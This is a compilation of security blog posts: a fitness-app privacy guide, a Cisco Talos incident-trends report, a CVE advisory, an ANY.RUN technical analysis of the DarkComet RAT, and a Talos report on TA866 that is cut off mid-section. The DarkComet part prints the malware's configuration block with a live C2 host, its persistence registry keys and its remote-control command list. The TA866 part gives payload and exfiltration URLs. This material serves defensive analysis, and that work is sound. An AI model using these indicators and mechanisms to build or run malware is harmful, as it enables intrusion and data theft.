As we’ve discussed before, one does not simply install a fitness tracking app and start using it straight away without first configuring the privacy settings both on the phone and in the app itself. With default settings, these apps often share full details of your workouts with the entire internet, including your precise location. And criminals and fraudsters can use this data for their nefarious purposes.

If you care even in the slightest about your privacy, check out our previously published guides for general smartphone settings and other popular fitness apps: Strava, Nike Run Club, and MapMyRun. Today’s post is for all fans of the famous three stripes: we’ll be setting up privacy in the adidas Running app (available for Android and iOS).

Formerly known as Runtastic, this fitness app now belongs to Europe’s largest sportswear manufacturer and is simply called adidas Running. While adidas Running doesn’t offer as granular privacy controls as, say, Strava, it’s still crucial to make sure everything is configured correctly.

To access the privacy settings in adidas Running, tap Profile in the bottom right corner, then the cog icon in the top right, then select Privacy.

The first thing you’ll want to check is the Maps section (who can see your maps) — make sure it’s set to either Followers or, even better, Only me.

Next, do the same for Activity (who can see your activity) — again, select either Followers or Only me. The remaining settings are slightly less critical, but it’s still a good idea to ensure they’re also set to at least Followers or, ideally, Only me.

I also recommend toggling off the switches at the bottom of the page next to Follower suggestions and Join running leaderboard. The app won’t be bothering you as much.

Finally, consider disabling excessive notifications from adidas Running. Go back to Settings, select Notifications, and go through the (rather extensive) list of options.

If you decide to stop using adidas Running altogether, remember to delete your profile data. To do this, go to Settings → Account, tap the big red Delete account button, and follow the prompts.

If you use other fitness apps to track your workouts, you can set their privacy settings using our guides:

Strava
Nike Run Club
MapMyRun
(ASICS Runkeeper – still to come)

You can also learn how to configure privacy in other apps — from social networks to browsers — on our website Privacy Checker.

And Kaspersky Premium will maximize your privacy protection and shield you from digital identity theft on all your devices.

Don’t forget to subscribe to our blog to stay ahead of scammers with more guides and helpful articles.

Kaspersky official blog – ​Read More

Threat actors are increasingly conducting identity-based attacks across a range of operations that are proving highly effective, with credential theft being the main goal in a quarter of incident response engagements.

These attacks were primarily facilitated by living-off-the-land binaries (LoLBins), open-source applications, command line utilities, and common infostealers, highlighting the relative ease at which these operations can be carried out. In addition to outright credential harvesting, we also saw password spraying and brute force attacks, adversary-in-the-middle (AitM) operations, and insider threats, underscoring the variety of ways in which actors are compromising users’ identities.  

Identity-based attacks are concerning because they often involve actors launching internal attacks from a compromised, valid account–making such activity difficult to detect. Moreover, once account compromise is achieved, an actor can carry out any number of malicious activities, including account creation, escalating privileges to gain access to more sensitive information, and launching social engineering attacks, like business email compromise (BEC), against other users on the network. 

Threats against identity 

This quarter, Cisco Talos Incident Response (Talos IR) has responded to a growing number of engagements in which adversaries have leveraged password-spraying campaigns to obtain valid usernames and passwords to facilitate initial access. This quarter, 25 percent of incidents involved password spraying and/or brute force attempts to steal valid credentials. This method involves an adversary using a password, or a small list of commonly used passwords, against many different accounts on a network, a strategy that helps avoid account lockouts that would typically occur when brute-forcing a single account with many passwords. Although adversaries have been using password-spraying attacks for credential access for years, the activity illustrates that organizations should continue to stress the importance of multi-factor authentication (MFA) and strong password policies to limit unauthorized attempts.  

Talos IR observed AitM phishing attacks play out in a number of ways this quarter, where adversaries attempted to trick users into entering their credentials into fake login pages. In one engagement, Talos IR investigated a phishing case where, after clicking a malicious link in a phishing email, the victim was redirected to a site prompting them to enter their credentials, and subsequently approved an MFA request. In another engagement, an initial phishing email redirected a user to a page that simulates a Microsoft O365 login and MFA portal, capturing the user’s credentials and subsequently logging in on their behalf. The first login by the adversary was seen 20 minutes after the initial phishing email, highlighting the speed, ease, and effectiveness of these operations. 

Ransomware 

Ransomware, pre-ransomware, and data theft extortion – in which cybercriminals steal and threaten to release victims’ files or other data without using any encryption mechanisms — accounted for nearly 40 percent of engagements this quarter. Talos IR observed RansomHub, RCRU64, and DragonForce ransomware variants for the first time this quarter, while also responding to previously seen ransomware variants, such as BlackByte, Cerber, and BlackSuit. 

A third of these engagements involved exploitation of known vulnerabilities that are consistently leveraged by ransomware operators/affiliates to deploy ransomware, according to public reporting. For example, in one BlackByte ransomware engagement, we observed an admin account created and added to an “ESX Admin” group as part of exploitation of the ESXi hypervisor vulnerability, CVE-2024-37085. This vulnerability, which has reportedly been exploited by other ransomware operators, involves a domain group whose members are granted full administrative access to the ESXi hypervisor by default without proper validation. 

As part of a years-long trend in greater democratization of ransomware adversaries, we continue to see new variants and ransomware operations emerging. In an incident involving the RCRU64 ransomware –a malware family that has received limited public reporting – the adversary used stolen credentials on an accidentally exposed remote desktop protocol (RDP) account to gain initial access. The threat actor then performed a dump of all domain credentials using publicly available tools, such as fgdump and pwdump, to steal Windows hashes. The threat actor also deployed custom tools, including “saxcvz.exe” and “close.exe”, to kill processes and close SQL servers running on the host, respectively. Open-source tools such as Mimikatz, Advanced Port Scanner, and IObit Unlocker were also used to facilitate the compromise. Of note, Talos has not previously seen IObit Unlocker used in a ransomware incident, though the tool has been used in Play ransomware attacks, according to the U.S. Cybersecurity and Infrastructure Security Agency (CISA). 

Looking forward: While there are constantly new ransomware groups entering the threat landscape, some established operations still pose a risk and should not be ignored. We saw this most recently last quarter with RansomHub, where Talos IR not only observed RansomHub actors in two separate incidents, but also using two different extortion models: double-extortion and data theft extortion. For example, we observed RansomHub affiliates conduct data theft extortion, where affiliates steal and threaten to release data without deploying ransomware or using any encryption mechanisms, as well as leverage a double-extortion model by deploying ransomware and encrypting systems and exfiltrating data to extort victims, respectively. In late August, this activity coincided with a CISA advisory on the RansomHub ransomware group, which disseminated indicators of compromise (IOCs) and tactics, techniques and procedures (TTPs) identified as recently as August. While RansomHub was first discovered in February 2024, the recent Talos IR incidents and CISA advisory warrants that this continues to be a ransomware threat to monitor. 

Targeting 

Organizations in the education, manufacturing, and financial services verticals were most affected this quarter, where combined, these sectors accounted for more than 30 percent of compromises. This finding is in line with targeting trends from Q1 2024 (January – March), where the education and manufacturing companies were the most targeted. 

Initial access 

For the fourth consecutive time in over a year, the most observed means of gaining initial access was the use of valid accounts, accounting for 66 percent of engagements when initial access could be determined. This is a slight increase compared to the previous quarter (60 percent). Additionally, 20 percent of engagements featured adversaries exploiting or leveraging vulnerable and public-facing applications for initial access. 

Looking forward: Talos IR identified a sophisticated actor targeting a critical infrastructure entity leveraging several known vulnerabilities in internet-facing web servers and two F5 BIG-IP network appliances, consistent with Talos’ reporting on state-sponsored and other sophisticated adversaries’ increased interest in targeting network devices. We assess that networking equipment will remain an attractive target due to the large attack surface it presents and potential access to victim networks it can offer, highlighting the dichotomy of high value and weak security in these devices that makes them a prime target for exploitation. This activity is another reminder of the importance of patching systems, especially network-facing devices. 

Security weaknesses 

We continue to see a significant number of compromises that could have been prevented with the presence of certain security fundamentals, like MFA and proper configuration of endpoint detection products. In nearly 40 percent of engagements, misconfigured MFA, lack of MFA, and MFA bypass accounted for the top observed security weaknesses this quarter. Additionally, in 100 percent of the engagements that involved threat actors sending phishing emails to victims, MFA was bypassed or not fully enabled, while over 20 percent of incidents where ransomware was deployed did not have MFA enabled on VPNs. 

Other security weaknesses, which we commonly see every quarter, involved improper endpoint detection and response (EDR) or security solution misconfigurations. For example, lack of EDR on all systems and/or poorly configured EDR solutions accounted for nearly 30 percent of incidents this quarter. Additionally, nearly 20 percent of engagements this quarter had misconfigured or not fully enabled network security solutions. 

In an incident involving SocGholish, a drive-by malware framework, Talos IR recommended configuring Cisco Umbrella properly to block unwanted content, which could have helped to prevent this attack. Blocking “uncategorized” websites in Cisco Umbrella’s “Web Content Categories” will help proactively mitigate suspicious or malicious activity. 

Top-observed MITRE ATT&CK techniques 

The table below represents the MITRE ATT&CK techniques observed in this quarter’s Talos IR engagement. Given that some techniques can fall under multiple tactics, we grouped them under the most relevant tactic in which they were leveraged. Please note, this is not an exhaustive list. 

Key findings from the MITRE ATT&CK appendix include:  

In terms of identity-based attacks, we consistently saw adversaries leveraging reconnaissance tactics to identify/gather credentials and then use those valid accounts to gain initial access. This also contributes to the growing trend this quarter in which adversaries are leveraging password spraying to obtain credentials. Nearly 20 percent of engagements this quarter featured proxy usage for command and control (C2). This activity included tools such as the Fast Reverse Proxy (FRPC) to establish a connection, or the Neo-reGoerg proxy tool to set up a SOCKS proxy. In a significant shift compared to previous quarters, we saw a decrease in adversary usage of remote access software, such as AnyDesk. Remote access software was used in less than 5 percent of engagements this quarter, compared to 35 percent last quarter (Q2 2024), where these tools provide the attacker an ability to control a target computer remotely. 

Tactic

Technique

Example

Initial Access (TA0001)

T1078 Valid Accounts

Adversary leveraged stolen or compromised credentials

Reconnaissance (TA0043)

T1592 Gather Victim Host Information

Text file contains details about host

Persistence (TA0003)

T1136 Create Account

Created a user to add to the local administrator’s group

Execution (TA0002)

T1059.001 Command and Scripting Interpreter: PowerShell

Executes PowerShell code to retrieve information about the client’s Active Directory environment

Discovery (TA0007)

T1046 Network Service Discovery

Use a network or port scanner utility

Credential Access (TA0006)

T1003 OS Credential Dumping

Deploy Mimikatz and publicly available password lookup utilities

Privilege Escalation (TA0004)

T1484 Domain Policy Modification

Modify GPOs to execute malicious files

Lateral Movement (TA0008)

T1021.002 Remote Services: SMB / Windows Admin Shares

Adversaries may abuse valid accounts using SMB to move laterally in a target environment.

Defense Evasion (TA0005)

T1562.001 Impair Defenses: Disable or Modify Tools

Adversaries may disable or uninstall security tools to evade detection

Command and Control (TA0011)

T1105 Ingress Tool Transfer

Adversaries may transfer tools from an external system to a compromised system

Impact (TA0040)

T1486 Data Encrypted for Impact

Deploy Hive ransomware and encrypt critical systems

Exfiltration (TA0010)

T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol

Use WinSCP for potential exfiltration of system information

Collection (TA0009)

T1074 Data Staged

Adversary collected data in a central location prior to exfiltration

Software/Tool

S0357 Impacket

An open-source collection of modules written in Python for programmatically constructing and manipulating network protocols

Cisco Talos Blog – ​Read More

Overview

The Cybersecurity and Infrastructure Security Agency (CISA) recently added a vulnerability related to ScienceLogic SL1, previously known as EM7, to its Known Exploited Vulnerabilities (KEV) catalog.  

The specific vulnerability in question, designated as CVE-2024-9537, has been classified as critical. It relates to a third-party utility included with the ScienceLogic SL1 package. Notably, the name of this utility has not been disclosed to prevent providing insights to potential threat actors.

The newly identified vulnerability, designated CVE-2024-9537, has a critical CVSS score of 9.3. It involves a remote code execution issue linked to a third-party component within ScienceLogic SL1.

This specific vulnerability has attracted many users and cybersecurity professionals, particularly those who follow it on social media, where users have reported that the flaw, a zero-day remote code execution vulnerability, was exploited.

Importance of Addressing the Vulnerability

ScienceLogic SL1 is a vital IT operations management platform that supports critical functions such as monitoring, automation, and optimization of hybrid cloud environments. However, the recent vulnerability related to a bundled third-party component highlights significant security concerns. Organizations should prioritize evaluating and securing these components to protect against vulnerabilities that could compromise their overall security framework.

“CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria”, says the Cybersecurity and Infrastructure Security Agency (CISA).

Recommendations for Organizations

To mitigate the risks associated with this critical vulnerability, organizations are urged to take the following steps:

Ensure that all software and hardware systems are updated with the latest patches released by official vendors. Establish a routine schedule for applying critical patches immediately to protect against potential exploits.

Create a comprehensive patch management strategy that includes inventory management, patch assessment, testing, deployment, and verification. Where feasible, automate these processes to enhance consistency and efficiency.

Implement proper network segmentation to isolate critical assets from less secure areas. Utilizing firewalls, VLANs, and access controls can significantly reduce the attack surface exposed to potential threats.

Develop and maintain an incident response plan that outlines procedures for detecting, responding to, and recovering from security incidents. Regular testing and updates of this plan are essential to ensure its effectiveness.

Implement comprehensive monitoring and logging solutions to detect and analyze suspicious activities. Using Security Information and Event Management (SIEM) systems can facilitate real-time threat detection and response.

Proactively identify and evaluate the criticality of End-of-Life (EOL) products within the organization. Timely upgrades or replacements are crucial to minimizing security risks.

Conclusion

The recent identification of the CVE-2024-9537 vulnerability in ScienceLogic SL1 highlights rising cybersecurity challenges. With a critical CVSS score of 9.3, this remote code execution flaw emphasizes the risks associated with third-party components in IT operations management platforms.

To mitigate these risks, organizations must prioritize timely software updates, establish robust patch management processes, and enhance network segmentation. Implementing comprehensive incident response plans and utilizing monitoring tools like SIEM systems will further strengthen security measures.

The post CISA Adds ScienceLogic SL1 Vulnerability to Known Exploited Vulnerabilities (KEV) Catalog appeared first on Cyble.

Blog – Cyble – ​Read More

Editor’s note: The current article is authored by Mostafa ElSheimy, a malware reverse engineer and threat intelligence analyst. You can find Mostafa on X and LinkedIn. 

In this malware analysis report, we take an in-depth look at how the Remote Access Trojan (RAT) DarkComet has been used by attackers to remotely control systems, steal sensitive data, and execute various malicious activities. 

Overview 

DarkComet is a Remote Access Trojan (RAT) initially developed by Jean-Pierre Lesueur in 2008. This malware runs silently in the background, collecting sensitive information about the system, users, and network activity.  

It attempts to steal stored credentials, usernames, passwords, and other personal data, transmitting this information to a destination specified by the attacker.  

Backdoor.DarkComet allows attackers to install further malicious software on the infected machine or enlist it in a botnet for sending spam or other malicious activities.  

Symptoms of an infection may not be noticeable to the user, as it can disable antivirus programs and other Windows security features.  

Distribution methods include: 

Bundling with free software. 

Disguising as harmless programs in emails. 

Exploiting software vulnerabilities on websites. 

DarkComet became widely used due to its user-friendly graphical interface, which contributed to its popularity.

Technical Details 

Let’s run a sandbox analysis session using ANY.RUN to discover the technical details of this malware. 

View analysis session 

Changing file attributes 

DarkComet uses a command-line operation to alter file attributes, making its components more difficult to detect.  

It uses attrib to display or change file attributes 

+s (System Attribute): Marks the file as a system file, making it appear as a critical part of the operating system. 

+h (Hidden Attribute): Hides the file from regular view in Windows Explorer, making it invisible to most users. 

It drops an executable at C:UsersadminDocumentsMSDCSCmsdcsc.exe and executes it, making it harder to detect. 

Contacting Malicious Domains 

The malware establishes communication with a specified malicious domain, enabling remote control and data exfiltration. 

Modifying Process Privileges 

The malware interacts with the Windows APIs LookupPrivilegeValueA and AdjustTokenPrivileges to modify the privileges associated with the current process’s access token (not the process itself).  

This is done by obtaining a handle to the process’s access token, which allows the malware to modify its security context. 

If a2 is 0, the privilege is removed (Attributes = 0). 

If a2 is 1, the privilege is enabled (Attributes = 2). 

Gathering System Information 

Retrieving Hardware Profile 

DarkComet uses the GetCurrentHwProfileA API to collect detailed information about the infected system’s hardware: 

Hardware Profile ID (HWID): A Globally Unique Identifier (GUID) that identifies the current hardware profile, allowing the malware to uniquely recognize the system. 

Dock State: Extracted through the dwDockInfo field, this information reveals whether the system is docked (e.g., connected to a docking station) or undocked. This helps the malware adapt its behavior based on the system’s hardware configuration. 

Retrieving Date, Time, and Location 

The malware also gets the date and time of the victim device. 

It also checks the computer’s location settings by querying the registry key associated with the current user’s Security Identifier (SID):  

REGISTRYUSER{SID}Control PanelInternationalGeoNation 

Data Processing and Manipulation 

DarkComet uses a function called sub_4735E8 multiple times with different strings as parameters. 

This function carries out resource management and processes various pieces of data, including:  

C2 Domain Information: The Command and Control server the malware communicates with. 

SID (Security Identifier): Identifies the user profile associated with the malware’s activity. 

Mutex Values: Used to ensure that only one instance of the malware runs on the infected system at a time. 

This function helps obfuscate key information, preventing it from appearing directly in the strings section of the malware. 

With this function, the malware loops through DARKCOMET DATA to retrieve specific attributes based on the provided parameter strings. 

Here is the loop that the malware uses to iterate through DARKCOMET DATA: 

Within sub_4735E8, DarkComet iterates through its internal data set, known as DARKCOMET DATA, to match specific parameters and extract corresponding attributes. This process involves looping through data entries to retrieve the needed values based on the provided strings. 

Extracted DARKCOMET DATA: 

#BEGIN DARKCOMET DATA —

MUTEX={DC_MUTEX-D1SPNDG}

SID={Sazan}

FWB={0}

NETDATA={8.tcp.eu.ngrok.io:27791}

GENCODE={fKTZRKdv0Nij}

INSTALL={1}

COMBOPATH={7}

EDTPATH={MSDCSC\msdcsc.exe}

KEYNAME={MicroUpdate}

EDTDATE={16/04/2007}

PERSINST={0}

MELT={0}

CHANGEDATE={0}

DIRATTRIB={6}

FILEATTRIB={6}

FAKEMSG={1}

EF={1}

MSGCORE={{42696C67697361796172FD6EFD7A20332073616E6979652069E7696E64652079656E6964656E206261FE6C6174FD6C6163616B74FD722E2E2E}

MSGICON={48}

SH1={1}

CHIDEF={1}

CHIDED={1}

PERS={1}

OFFLINEK={1}

#EOF DARKCOMET DATA —

From this data, the malware extracts and processes key attributes, including: 

C2 domain: Specifies where the malware sends stolen data. 

EDTDATE: The date associated with the malware’s installation (e.g., 16/04/2007), indicating that it does not alter the date of the dropped executable. 

Mutex: Ensures that only one copy of DarkComet runs on the system. 

Campaign name: Used for identifying specific attacks or operations. 

It also processes the attributes of the malware that define how it behaves and interacts with the system: 

EDTPath: Path of the executable (MSDCSCmsdcsc.exe) 

Registry Key (KEYNAME): MicroUpdate, used to maintain persistence in the system’s registry. 

From the DARKCOMET DATA, we can also notice that the malware does not change the original creation date of the dropped executable. The CHANGEDATE attribute is set to 0, indicating that the date remains unchanged, which can help the malware blend in with other files and avoid raising suspicion during forensic analysis. 

Dropped Executable File 

DarkComet drops a file named msdcsc.exe in the C:UsersadminDocumentsMSDCSC directory and executes it from there. 

This dropped file is identical to the original malware executable. 

This means it can start itself from another location. By doing so, the malware can better evade detection, as running from a new path makes it more challenging for security tools to track its activity. 

Persistence Mechanisms 

To maintain persistence on the infected system, DarkComet: 

Adds Run key: It creates a registry entry at SOFTWAREMicrosoftWindowsCurrentVersionRunMicroUpdate with the path of the executable. 

Modifies the WinLogon registry key: It alters REGISTRYMACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonUserInit for persistance. 

DLL Loading and Function Resolution 

DarkComet retrieves handles to the modules (DLLs) such as kernel32.dll and user32.dll for further manipulation and execution of its malicious functions. 

RAT Functionalities 

DarkComet has various capabilities that allow it to manipulate the infected system and gather information. These include functions for simulating user input, capturing data, and interacting with the system’s display and clipboard. 

Simulating Mouse and Keyboard Actions 

DarkComet uses the mouse_event function to simulate mouse motion and button clicks.  

This helps the attacker to interact with the system as if a user is controlling the mouse. 

This malware also uses Keyboard Event Simulation, particularly, the keybd_event function to allow the malware to manipulate the user’s environment, input data, or perform actions without the user’s knowledge. 

Capturing Keyboard Inputs 

The malware calls GetKeyboardType(0) to determine the type of the primary keyboard. If it returns 7, it indicates that the keyboard is a “language” keyboard, which is often a Unicode keyboard. 

The next function captures keystrokes from the user, allowing the malware to record input without detection. 

The function used by DarkComet processes each character input (ch), which could represent a keyboard key or a specific command. It applies a series of conditional checks and actions based on the character’s value. 

This malware utilizes the VkKeyScanA(ch) function to convert the character into a virtual key code. This conversion allows the malware to accurately interpret and simulate keyboard actions, making it easier to log keystrokes or execute commands. 

System and Display Information 

The malware uses EnumDisplayDevicesA function to retrieve information about display devices connected to the system. 

DarkComet attempts to access data from the clipboard, focusing on format 0xE, which is used for enhanced metafiles (EMF) – a vector graphics format. By doing so, the RAT can exfiltrate or manipulate clipboard data, such as copied images or text. 

C2 Commands and Remote Control 

DarkComet receives instructions from its Command and Control (C2) server, allowing it to perform various remote tasks. These commands enable the attacker to control the malware’s behavior and may include actions like: 

Data exfiltration: Extracting files or information from the infected system. 

System manipulation: Modifying system settings or terminating processes. 

Additional payload delivery: Deploying additional malicious software into the infected system. 

See Appendix I for the extracted commands that the C2 server sends to the malware.  

These commands help control the malware’s behavior remotely and may provide insight into the attacker’s objectives and tactics.

Conclusion 

DarkComet is a highly capable Remote Access Trojan (RAT) that continues to be a threat due to its stealthy behavior and extensive feature set. It allows attackers to manipulate infected systems remotely, steal sensitive information, and install additional malware.  

This analysis has demonstrated DarkComet’s ability to evade detection by modifying file attributes, manipulating registry keys for persistence, and escalating privileges. It gathers system information, including hardware profiles and location settings, and communicates with a command-and-control (C2) server to execute a variety of commands, from capturing keystrokes to controlling display devices. 

The malware’s functionality, including its ability to modify system settings, simulate user input, and manage services, makes it a versatile tool for attackers. Its ease of use, coupled with a rich set of RAT functionalities, has contributed to its widespread deployment, especially in targeted cyberattacks. 

About ANY.RUN  

ANY.RUN helps more than 400,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.  

With ANY.RUN you can: 

Detect malware in seconds. 

Interact with samples in real time. 

Save time and money on sandbox setup and maintenance 

Record and study all aspects of malware behavior. 

Collaborate with your team 

Scale as you need. 

Request free trial → 

Appendix I

IOCs 

Hashes 

md5: 1b540a732f2d75c895e034c56813676a 

sha1: 0dd8c542fd46dd5b55eefcf35382ee8903533703 

sha256: 90d3dbe2c8ae46b970a865f597d091688e7c04c7886a1ec287e4b7a0f5e2fcf1

C2 

8[.]tcp[.]eu[.]ngrok[.]io[:]27791 

Registry keys 

REGISTRYMACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonUserInit = “C:\Windows\system32\userinit.exe,C:\Users\Admin\Documents\MSDCSC\msdcsc.exe” 

REGISTRYUSERUSER SIDSOFTWAREMicrosoftWindowsCurrentVersionRunMicroUpdate = “C:\Users\Admin\Documents\MSDCSC\msdcsc.exe” 

Dropped executable file 

C:UsersadminDocumentsMSDCSCmsdcsc.exe 

TTPs

Commands

GetSIN

RefreshSIN

RunPrompt

GetDrives

GetSrchDrives

GetFileAttrib

KillProcess

GetAppList

GetServList

StartServices

StopServices

RemoveServices

InstallService

GetStartUpList

ActiveOnlineKeylogger

ActiveOfflineKeylogger

GetOfflineLogs

Shutdown

RestartComp

LogOffComp

PowerOff

GetFullInfo

GetSystemInfo

OpenWebPage

PrintText

GetTorrent

GetPrivilege

TraceRoute

#BOT#VisitUrl

#BOT#OpenUrl

#BOT#Ping

#BOT#RunPrompt

#BOT#CloseServer

#BOT#SvrUninstall

#BOT#URLUpdate

DOWNLOADFILE

UPLOADFILE

ACTIVEREMOTESHELL

DESKTOPCAPTURE

WEBCAMLIVE

WIFI

CHAT

FTPFILEUPLOAD

The post DarkComet RAT: <br>Technical Analysis of Attack Chain appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

TA866 (also known as Asylum Ambuscade) is a threat actor that has been conducting intrusion operations since at least 2020. TA866 has frequently relied on commodity and custom tooling to facilitate post-compromise activities. These tools often perform specific functions and are deployed and used as needed in the context of specific intrusions. Cisco Talos assesses with high confidence that TA866 frequently leverages business relationships with other threat actors across various stages of their attacks to help them achieve their mission objective(s). We assess with high confidence that recent post-compromise intrusion activity associated with WarmCookie/BadSpace is related to previous post-compromise activity that we attribute to TA866. We assess that WarmCookie was likely developed by the same threat actor that developed the Resident backdoor that was delivered in previous intrusions that we attribute to TA866. 

Who is TA866? 

TA866, also called Asylum Ambuscade, is a threat actor that has been observed conducting intrusion operations since at least 2020. TA866 has historically been associated with financially motivated malware campaigns. However, prior reporting indicates that they may also conduct espionage-related activities. Cisco Talos has been monitoring and analyzing the malware distribution campaigns, and post-compromise intrusion activity associated with TA866 and has observed continued evolution in the tooling and tactics, techniques and procedures (TTPs) employed by this threat actor since early 2023.  

Throughout 2023, these malware campaigns typically relied on malspam or malvertising to facilitate the delivery of malicious content to potential victims. In many cases, this content is used to redirect victims to traffic distribution systems (TDS), such as 404 TDS, operated by threat actors offering malware installation services.  

This is followed by the deployment of a variety of malicious components. Since at least early 2023, this has typically included WasabiSeed, ScreenShotter and AHK Bot. Based on analysis of post-compromise activity associated with this tooling, we assess with high confidence that TA866 also sometimes deploys a persistent backdoor called Resident, CSharp-Streamer-RAT, Cobalt Strike and Rhadamanthys on compromised systems. To enable the performance of various post-compromise enumeration and reconnaissance activities, we have also observed the use of utilities such as AdFind and network scanners. TA866 also commonly deploys remote access solutions on infected systems such as AnyDesk and Remote Utilities. 

We have observed continued ongoing evolution in the implementation of the malware tooling leveraged by TA866 that enables them to operate more effectively once they obtain initial access. This demonstrates an adversary that is constantly evolving as they attempt to gain access to corporate networks and pursue their mission objective(s).  

While analyzing recent WarmCookie/BadSpace activity, we observed a case in early 2024 where Cobalt Strike and CSharp-Streamer-RAT were deployed as follow-on payloads following the initial WarmCookie infection. The SSL certificate used on the CSharp-Streamer-RAT C2 server (185[.]73[.]124[.]164) appeared to have been generated using information programmatically populated using an algorithm defined by the threat actor. This same algorithm appears to have been used on three additional CSharp-Streamer-RAT C2 servers, one of which (109[.]236[.]80[.]191), was the C2 server for a CSharp-Streamer-RAT sample observed in a prior intrusion in 2023 that we attribute to TA866.  

Typical distribution campaigns 

As previously mentioned, initial access to target environments is typically obtained by TA866 through successfully infecting systems via either malspam or malvertising. Throughout 2022 and 2023, we frequently observed TA866 relying on both methods for initiating the infection process. 

In the case of malspam, we have observed TA866 relying on various lure themes and techniques, including email thread hijacking, a technique where threat actors leverage replies to legitimate email threads that the recipient was previously a part of to increase the legitimacy of the malicious email. Prior reporting suggests that, in previous campaigns, the malspam may have been associated with a spam botnet operated by TA571.  

In most cases, the threat actor embedded malicious hyperlinks, either directly into the body of the email message, or within an attached document, typically PDFs or Microsoft Publisher files. Below is an example of an email from an earlier TA866 campaign. 

In the case of malvertising, we have observed instances of users being infected while browsing for legitimate software downloads for applications such as TeamViewer when the infection process began. Prior reporting indicates that TA866 has been observed leveraging malicious Google advertisements and SEO poisoning to infect victims. 

The hyperlinks in these cases pointed to entry points into the 404 TDS. The 404 TDS is a traffic distribution system that enables adversaries to deploy rapidly changing infrastructure which is used to direct potential victims to malicious content, in many cases, malware.  

In the case of 404 TDS, the URLs accessed typically return an HTTP/404 error code, but a meta refresh is used to redirect victims to additional intermediary servers. These intermediary servers are typically responsible for identifying/querying information about the visiting systems to determine whether to redirect them to the malicious content or simply to a benign destination such as a search engine or email provider. 

In cases where malicious TDS redirection occurs, victims are delivered malicious payloads, which in the case of analyzed TA866 activity, are typically the malicious JavaScript-based downloaders used to initiate the infection process. 

Infection chains and tooling 

The most commonly observed infection chain associated with intrusions we attribute to TA866 is typified by the use of multiple distinct stages of custom malware, each responsible for conducting different actions to facilitate additional data gathering, reconnaissance and enable the threat actor flexibility in determining if a given infected system is a high-value target and whether they should operate further in compromised environments.

We have observed cases where extended periods of time elapse between when the threat actor gains initial access and persistence within compromised environments and the delivery of additional payloads, followed by the conduction of post-compromise activity within the environment. Over time we have observed variations in the infection chains used following initial compromise and assess that TA866 likely chooses to deploy tools in specific situations or target environments as needed while operating towards their longer-term mission objective(s). While variations do exist, we have observed consistent use of various tooling over the past couple of years, as described in the following sections. 

JavaScript downloaders 

In most observed cases, the infection process begins with the delivery of a malicious JavaScript downloader via the distribution process(es) previously described. This downloader is responsible for retrieving the next stage of the infection chain, which is often MSI packages containing a malware payload called WasabiSeed. The obfuscation used to hide the JavaScript being executed has varied across campaigns over time. An example of one is shown below. 

This code is responsible for initiating an HTTPS connection to retrieve and execute the WasabiSeed MSI package. In this case, the URL hosting the MSI package was: 

hxxps[:]//perfectsystems-ltd[.]com/x-css/cd.msi

Once downloaded, the MSI is passed to MsiExec to execute the next stage of the process. 

WasabiSeed  

WasabiSeed effectively functions as another downloader stage that is used to retrieve additional payloads from attacker-controlled servers. This is performed by a VBScript included in the MSI package delivered to infected systems. 

During execution, the MSI creates a subfolder within %PROGRAMDATA% and copies a malicious VBScript into this location. The name of the subdirectory and VBScript file varies across analyzed samples. 

A CustomAction[.]idt is defined, which executes the VBScript using wscript[.]exe when the MSI is run. The VBScript is stored in a CAB archive contained within the MSI package. Persistence is achieved via the use of an LNK shortcut that is dropped into the Startup directory on the system, ensuring that WasabiSeed is executed each time the system reboots. When run, it continuously reaches out to obtain arbitrary payloads in the form of MSI packages that are then executed by MsiExec to infect systems with additional malware. 

The URL used by this payload retrieval process is randomized using the drive serial number of the infected system, making it unique to each system. This continuous polling allows the delivery of arbitrary payloads at the discretion of the threat actor at any point following initial access. In most cases, we observed subsequent delivery of an additional MSI containing a malware tool called Screenshotter.  

Screenshotter 

Screenshotter is a malware family used to generate periodic screenshots from infected systems which are transmitted to the threat actor over HTTP. We have observed the delivery of multiple variants of Screenshotter and have identified implementations of the malware in a variety of programming languages, including JavaScript and Python. 

We also identified an implementation of Screenshotter using an AutoHotKey script, likely to enable this functionality directly within AHK Bot, which is also often delivered during the infection process and described in the next section. 

In both the JavaScript and Python implementations of Screenshotter, the malware is delivered within an MSI package. The MSI associated with the JavaScript implementation contains two JavaScript files, “app[.]js” and “index[.]js” as well as a legitimate screen capture binary, typically IrfanView. Like WasabiSeed, a CustomAction[.]idt is used to execute the JavaScript files using wscript[.]exe, as shown below. 

The MSI creates a subdirectory with %PROGRAMDATA% and copies the Screenshotter components into it. The script “app[.]js” is responsible for executing IrfanView to capture screenshots periodically. It is also responsible for ensuring that only one instance of Screenshotter is running at a time. 

The script “index[.]js” is responsible for facilitating the transmission of captured screenshots to the adversary via C2. 

Like WasabiSeed, the URL used is generated using the drive serial number of the system, which is appended to the end of the URL used for exfiltration, as shown below.  

http://<C2 Server>/screenshot/<Drive Serial Number>

While we have observed variations in the JavaScript implementation of Screenshotter, in all cases the overall functionality and operation of the malware is consistent. 

The Python implementation also functions similarly with some notable differences. The CAB archive contains a legitimate Python installation as well as a Python script (screen1[.]pyw) that takes the place of IrfanView as used in the JavaScript implementation. A CustomAction[.]idt is used to execute a VBScript, as shown below. 

The VBScript executes the Python binary and passes the screen capturing Python script as a parameter.  

The Python script captures screenshots and transmits them to the C2 server, as shown in the example below. 

Screenshotter enables the collection of additional information such as typical system usage and potentially sensitive information being displayed on screen and allows the threat actor to determine whether they should continue to operate within the system and associated network environment. In a subset of cases analyzed, AHK Bot was also delivered and is described in the next section. 

AHK Bot 

Along with the deployment of WasabiSeed and Screenshotter, we have frequently observed the deployment of an AutoHotKey (AHK) based malware called AHK Bot.   

